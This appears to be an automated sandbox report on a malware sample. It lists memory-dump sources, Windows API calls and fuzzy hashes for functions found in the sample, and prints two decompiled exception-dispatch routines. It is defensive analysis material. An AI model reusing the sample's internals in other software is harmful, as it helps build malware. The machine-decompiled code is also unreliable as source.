                                                            0x00dd825b
                                                            0x00dd825c
                                                            0x00dd825c
                                                            0x00000000
                                                            0x00dd8244
                                                            0x00dd8244
                                                            0x00dd8244
                                                            0x00dd824d
                                                            0x00dd824e
                                                            0x00dd8250
                                                            0x00dd8252
                                                            0x00dd8252
                                                            0x00000000
                                                            0x00dd8244
                                                            0x00dd8242
                                                            0x00dd821e
                                                            0x00dd8225
                                                            0x00dd8225
                                                            0x00dd8227
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8229
                                                            0x00dd822a
                                                            0x00dd822d
                                                            0x00dd822f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd822f
                                                            0x00000000
                                                            0x00dd8225
                                                            0x00dd81a8
                                                            0x00dd81ab
                                                            0x00dd81b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81b9
                                                            0x00dd81bb
                                                            0x00dd81c1
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81c7
                                                            0x00dd81cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81d3
                                                            0x00dd81d5
                                                            0x00dd81de
                                                            0x00dd81e2
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81e8
                                                            0x00dd81eb
                                                            0x00dd81ed
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81f4
                                                            0x00dd81f6
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81f8
                                                            0x00dd81fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80e7
                                                            0x00dd80e7
                                                            0x00dd80e7
                                                            0x00dd80ee
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80f0
                                                            0x00dd80f1
                                                            0x00dd80f3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80f3
                                                            0x00dd811b
                                                            0x00dd811d
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd812d
                                                            0x00dd812f
                                                            0x00dd8131
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8137
                                                            0x00dd813e
                                                            0x00dd816a
                                                            0x00dd816a
                                                            0x00dd816c
                                                            0x00dd816e
                                                            0x00dd8182
                                                            0x00dd8184
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8170
                                                            0x00dd8170
                                                            0x00dd8170
                                                            0x00dd8179
                                                            0x00dd817a
                                                            0x00dd817c
                                                            0x00dd817e
                                                            0x00dd817e
                                                            0x00000000
                                                            0x00dd8170
                                                            0x00dd8140
                                                            0x00dd8140
                                                            0x00dd8143
                                                            0x00dd8145
                                                            0x00dd8157
                                                            0x00dd8157
                                                            0x00dd815a
                                                            0x00dd815c
                                                            0x00dd815c
                                                            0x00dd815d
                                                            0x00dd815d
                                                            0x00dd8163
                                                            0x00dd8163
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8147
                                                            0x00dd8147
                                                            0x00dd8147
                                                            0x00dd814e
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8150
                                                            0x00dd8150
                                                            0x00dd8151
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8151
                                                            0x00dd8153
                                                            0x00dd8155
                                                            0x00dd8168
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8168
                                                            0x00000000
                                                            0x00dd8155
                                                            0x00dd80c7
                                                            0x00dd80ca
                                                            0x00dd80cd
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80cf
                                                            0x00dd80d1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80d1
                                                            0x00dd8096
                                                            0x00dd8098
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00DD8106
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MemoryQueryVirtual
                                                            • String ID:
                                                            • API String ID: 2850889275-0
                                                            • Opcode ID: 071c3b502dda6b92ce5648f92f2e3dde132d4a1aa81c743a1d9a8dbd37b0f0af
                                                            • Instruction ID: 8d1a748db12cf4aec03d1a0c60daa7fb1c15814f189e73de990753a3d85006a9
                                                            • Opcode Fuzzy Hash: 071c3b502dda6b92ce5648f92f2e3dde132d4a1aa81c743a1d9a8dbd37b0f0af
                                                            • Instruction Fuzzy Hash: 1C61D330A007029FDB2BCF6DC88163977B6EB45354B28856BD856C7394EF31DC4AA674
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456E9BD, Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: cf8978d9d50053ee4d0660a6ae44a88e153db6143fa0ecd40754976b890c4928
                                                            • Instruction ID: c80415bcfb89ea36b5b8731b901037ac88e43b20fb3ab67b639b3e349b5ca10a
                                                            • Opcode Fuzzy Hash: cf8978d9d50053ee4d0660a6ae44a88e153db6143fa0ecd40754976b890c4928
                                                            • Instruction Fuzzy Hash: 67D17D34A0124ADFDF18CFA8D4965EEBBB1FF84304F24856DE853A7250E730A955EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456D1F8, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0456D268
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateProcessUser
                                                            • String ID:
                                                            • API String ID: 2217836671-0
                                                            • Opcode ID: 5b572fb4d608250614a99f968054dd36dfaab0afa1c54266fab7f29d89aa6362
                                                            • Instruction ID: 3a8fa57fff01f52363a7b1c4a558b5b344d2b8c1f5da9315c097b42413e16775
                                                            • Opcode Fuzzy Hash: 5b572fb4d608250614a99f968054dd36dfaab0afa1c54266fab7f29d89aa6362
                                                            • Instruction Fuzzy Hash: 0A11A23220414DBFEF424E98ED41DEE7B7AFF48364B054619FE1962120C736E875AB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04579180, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04579198
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorStatus
                                                            • String ID:
                                                            • API String ID: 1596131371-0
                                                            • Opcode ID: ffa4ae2727141afd4b36f6dd0dc0f1d31e7e727fe34d6b31f7e68c91be01d998
                                                            • Instruction ID: fa7b7a3dedbf27c33c1da1dbb5eb85fbf3698516a8925b8b6df412675e6889a0
                                                            • Opcode Fuzzy Hash: ffa4ae2727141afd4b36f6dd0dc0f1d31e7e727fe34d6b31f7e68c91be01d998
                                                            • Instruction Fuzzy Hash: 3FC012716082026FEA185A10E91DE2A7B15FB50340F00541CB04994070DF78A854E611
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456AD2E, Relevance: .6, Instructions: 583COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 93a0f9e6965e21eb474461c0c7a7e6704fd1945dbb02372d486fccd2de939bd2
                                                            • Instruction ID: 32252941fe9efd861769d2205387a53953c8a15cd31211f6636f9590f00cd99f
                                                            • Opcode Fuzzy Hash: 93a0f9e6965e21eb474461c0c7a7e6704fd1945dbb02372d486fccd2de939bd2
                                                            • Instruction Fuzzy Hash: D8427970A00B558FCB29CF69C4906AAB7F2FF49304F14896DD49B9B755E734B886DB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04565518, Relevance: .4, Instructions: 432COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23115a832860182a98218d2ce3fe1824957f59def6109b8f86834c60c99c3403
                                                            • Instruction ID: a067d3a743b8fcd2edbbcc38bce845b55da196845c9f7c145227d24d641186f6
                                                            • Opcode Fuzzy Hash: 23115a832860182a98218d2ce3fe1824957f59def6109b8f86834c60c99c3403
                                                            • Instruction Fuzzy Hash: E3021A71E00219DFCF18CF58D5906ACBBF2FF89315F1485AAD852AB285E734AA41EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04582339, Relevance: .4, Instructions: 386COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                                                            • Instruction ID: 0b43a14dbd4451c57b70d6ed8d5d7fc6faf99c5a431912984b96146b0d8769c3
                                                            • Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                                                            • Instruction Fuzzy Hash: CEF15330A08619ABCF0CCF9AD0A04BDBBB2FF89314F14C59EE4966B645CB346A45DF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456279B, Relevance: .3, Instructions: 298COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: 9f959aab1e7054f5ac0b1d4ee1ccee450809856f57c44b4f143954c4ba246fd5
                                                            • Instruction ID: b2870eae2b3621fe0632d74ad209dc5525a062ff8dfdb9d8389620fffd66fc7b
                                                            • Opcode Fuzzy Hash: 9f959aab1e7054f5ac0b1d4ee1ccee450809856f57c44b4f143954c4ba246fd5
                                                            • Instruction Fuzzy Hash: 1EC1FF36610B418FD735EF29C880AA6B3E1BF89304B54496EE9D787B61DB75F881DB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045852A0, Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                            • Instruction ID: d8d960ed55370ec1626aed6be5e892d3512db27ecc6c6b02a337ead7db64d2b0
                                                            • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                            • Instruction Fuzzy Hash: A821C432900208ABDB10FF68C8C096BBBA5FF84350B4981ACD959AB245EF30F915D7E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B2274, Relevance: .1, Instructions: 77COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E6E4B2274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E4B23DB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E4B2495(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E4B2380(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E4B23DB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E4B2477(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                            0x6e4b2278
                                                            0x6e4b2279
                                                            0x6e4b227a
                                                            0x6e4b227d
                                                            0x6e4b227f
                                                            0x6e4b2282
                                                            0x6e4b2283
                                                            0x6e4b2285
                                                            0x6e4b2286
                                                            0x6e4b2287
                                                            0x6e4b228a
                                                            0x6e4b2294
                                                            0x6e4b2345
                                                            0x6e4b234c
                                                            0x6e4b2355
                                                            0x6e4b229a
                                                            0x6e4b229a
                                                            0x6e4b22a0
                                                            0x6e4b22a6
                                                            0x6e4b22a9
                                                            0x6e4b22ac
                                                            0x6e4b22b0
                                                            0x6e4b22b5
                                                            0x6e4b22ba
                                                            0x6e4b233a
                                                            0x00000000
                                                            0x6e4b22bc
                                                            0x6e4b22bc
                                                            0x6e4b22c8
                                                            0x6e4b22ca
                                                            0x6e4b2325
                                                            0x6e4b2325
                                                            0x6e4b232b
                                                            0x00000000
                                                            0x6e4b22cc
                                                            0x6e4b22db
                                                            0x6e4b22dd
                                                            0x6e4b22de
                                                            0x6e4b22df
                                                            0x6e4b22e2
                                                            0x6e4b22e2
                                                            0x6e4b22e4
                                                            0x00000000
                                                            0x6e4b22e6
                                                            0x6e4b22e6
                                                            0x6e4b2330
                                                            0x6e4b22e8
                                                            0x6e4b22e8
                                                            0x6e4b22ec
                                                            0x6e4b22f4
                                                            0x6e4b22f9
                                                            0x6e4b22fe
                                                            0x6e4b230a
                                                            0x6e4b2312
                                                            0x6e4b2319
                                                            0x6e4b231f
                                                            0x6e4b2323
                                                            0x00000000
                                                            0x6e4b2323
                                                            0x6e4b22e6
                                                            0x6e4b22e4
                                                            0x00000000
                                                            0x6e4b22ca
                                                            0x6e4b233e
                                                            0x6e4b233e
                                                            0x6e4b233e
                                                            0x6e4b22ba
                                                            0x6e4b235a
                                                            0x6e4b2361

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                            • Instruction ID: 29926ae4e1aa80989250d438ea1019b0221f094dfe47d2356a161b23c83d5557
                                                            • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                            • Instruction Fuzzy Hash: C221C4329002059FCB00DFB8C880DABB7A9FF48350B458569D8558B245DB30FA15C7F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD7E30, Relevance: .1, Instructions: 77COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E00DD7E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00DD7F9B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00DD8055(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00DD7F40(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00DD7F9B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00DD8037(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                            0x00dd7e34
                                                            0x00dd7e35
                                                            0x00dd7e36
                                                            0x00dd7e39
                                                            0x00dd7e3b
                                                            0x00dd7e3e
                                                            0x00dd7e3f
                                                            0x00dd7e41
                                                            0x00dd7e42
                                                            0x00dd7e43
                                                            0x00dd7e46
                                                            0x00dd7e50
                                                            0x00dd7f01
                                                            0x00dd7f08
                                                            0x00dd7f11
                                                            0x00dd7e56
                                                            0x00dd7e56
                                                            0x00dd7e5c
                                                            0x00dd7e62
                                                            0x00dd7e65
                                                            0x00dd7e68
                                                            0x00dd7e6c
                                                            0x00dd7e71
                                                            0x00dd7e76
                                                            0x00dd7ef6
                                                            0x00000000
                                                            0x00dd7e78
                                                            0x00dd7e78
                                                            0x00dd7e84
                                                            0x00dd7e86
                                                            0x00dd7ee1
                                                            0x00dd7ee1
                                                            0x00dd7ee7
                                                            0x00000000
                                                            0x00dd7e88
                                                            0x00dd7e97
                                                            0x00dd7e99
                                                            0x00dd7e9a
                                                            0x00dd7e9b
                                                            0x00dd7e9e
                                                            0x00dd7e9e
                                                            0x00dd7ea0
                                                            0x00000000
                                                            0x00dd7ea2
                                                            0x00dd7ea2
                                                            0x00dd7eec
                                                            0x00dd7ea4
                                                            0x00dd7ea4
                                                            0x00dd7ea8
                                                            0x00dd7eb0
                                                            0x00dd7eb5
                                                            0x00dd7eba
                                                            0x00dd7ec6
                                                            0x00dd7ece
                                                            0x00dd7ed5
                                                            0x00dd7edb
                                                            0x00dd7edf
                                                            0x00000000
                                                            0x00dd7edf
                                                            0x00dd7ea2
                                                            0x00dd7ea0
                                                            0x00000000
                                                            0x00dd7e86
                                                            0x00dd7efa
                                                            0x00dd7efa
                                                            0x00dd7efa
                                                            0x00dd7e76
                                                            0x00dd7f16
                                                            0x00dd7f1d

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                            • Instruction ID: 4c63fe6a90e76ec5350cf8a56be0b3fce361618dda0f363419ac4ff314bd2438
                                                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                            • Instruction Fuzzy Hash: A121A4729042059BCB10EF68C8809ABB7A5FF44350B4985EAED558B345E730FD15C7F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457618E, Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 257memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 045761AF
                                                            • GetTickCount.KERNEL32 ref: 045761C9
                                                            • wsprintfA.USER32 ref: 0457621C
                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 04576228
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 04576233
                                                            • _aulldiv.NTDLL(?,?,?,?), ref: 04576249
                                                            • wsprintfA.USER32 ref: 0457625F
                                                            • wsprintfA.USER32 ref: 0457627D
                                                            • wsprintfA.USER32 ref: 04576294
                                                            • wsprintfA.USER32 ref: 045762B5
                                                            • wsprintfA.USER32 ref: 045762F0
                                                            • wsprintfA.USER32 ref: 04576314
                                                            • lstrcat.KERNEL32(?,?), ref: 0457634C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04576366
                                                            • GetTickCount.KERNEL32 ref: 04576376
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 0457638A
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 045763A8
                                                            • StrTrimA.SHLWAPI(00000000,045863D8,00000000,049BB188), ref: 045763DD
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 045763FD
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04576408
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0457640C
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 0457648D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0457649C
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,049BB188), ref: 045764AB
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 045764BD
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045764CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
                                                            • String ID: F{U{
                                                            • API String ID: 2878544442-3347341033
                                                            • Opcode ID: 5678339672d7757c82c92f04029936a1f8df84e62a4d610653819d65d915f85c
                                                            • Instruction ID: f910347e8637a12425b9942e75053fd14e09d2dc1d093fe010f23a7ec90988d4
                                                            • Opcode Fuzzy Hash: 5678339672d7757c82c92f04029936a1f8df84e62a4d610653819d65d915f85c
                                                            • Instruction Fuzzy Hash: 86A14871500206EFDB02DFA9EC84E5A3BE9FB48314F045429F549E7251DE39E818EF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045805BA, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 276memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 045805ED
                                                            • wsprintfA.USER32 ref: 04580652
                                                            • wsprintfA.USER32 ref: 04580698
                                                            • wsprintfA.USER32 ref: 045806B9
                                                            • lstrcat.KERNEL32(00000000,?), ref: 045806F0
                                                            • wsprintfA.USER32 ref: 0458070C
                                                            • wsprintfA.USER32 ref: 04580722
                                                            • wsprintfA.USER32 ref: 04580742
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0458075F
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04580780
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 0458079A
                                                              • Part of subcall function 04577DB7: lstrlen.KERNEL32(00000000,73BB81D0,?,00000000,00000000,?,?,045763BE,00000000,049BB188), ref: 04577DE2
                                                              • Part of subcall function 04577DB7: lstrlen.KERNEL32(?,?,?,045763BE,00000000,049BB188), ref: 04577DEA
                                                              • Part of subcall function 04577DB7: strcpy.NTDLL ref: 04577E01
                                                              • Part of subcall function 04577DB7: lstrcat.KERNEL32(00000000,?), ref: 04577E0C
                                                              • Part of subcall function 04577DB7: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,045763BE,00000000,049BB188), ref: 04577E29
                                                            • StrTrimA.SHLWAPI(00000000,045863D8,00000000,049BB188), ref: 045807CC
                                                              • Part of subcall function 045695DD: lstrlen.KERNEL32(049B9986,00000000,73BB81D0,00000000,045763E9,00000000), ref: 045695ED
                                                              • Part of subcall function 045695DD: lstrlen.KERNEL32(?), ref: 045695F5
                                                              • Part of subcall function 045695DD: lstrcpy.KERNEL32(00000000,049B9986), ref: 04569609
                                                              • Part of subcall function 045695DD: lstrcat.KERNEL32(00000000,?), ref: 04569614
                                                            • lstrcpy.KERNEL32(?,00000000), ref: 045807F0
                                                            • lstrcat.KERNEL32(?,?), ref: 045807FE
                                                            • lstrcat.KERNEL32(?,00000000), ref: 04580805
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04580810
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 0458082C
                                                              • Part of subcall function 0457BE8F: memcpy.NTDLL(?,04575AB0,00000010,?,?,?,?,?,?,?,?,?,?,04583452,00000000,00000001), ref: 0457BEE0
                                                              • Part of subcall function 0457BE8F: memcpy.NTDLL(00000000,00000001,04575AB0,0000011F), ref: 0457BF73
                                                            • HeapFree.KERNEL32(00000000,?,00000001,049BB188,?,?,?), ref: 045808FA
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04580909
                                                            • HeapFree.KERNEL32(00000000,?,00000000,049BB188), ref: 0458091B
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0458092D
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0458093C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpymemcpy$strcpy
                                                            • String ID: F{U{
                                                            • API String ID: 2173832509-3347341033
                                                            • Opcode ID: 15ca5481d6012a325eceb4f7f0e095f6442dfb3ff0b6923329b37a4719b4ca6d
                                                            • Instruction ID: 2783d373e1c55111bbee0e79b501fcb2d16b22eb5d5101b9ba7ff8cc2af8989d
                                                            • Opcode Fuzzy Hash: 15ca5481d6012a325eceb4f7f0e095f6442dfb3ff0b6923329b37a4719b4ca6d
                                                            • Instruction Fuzzy Hash: 78A16531504205EFD702EFA9EC84E1A7BE8FB88704F05542DF549E72A1DE39E808EB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD323C, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 262memorystringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
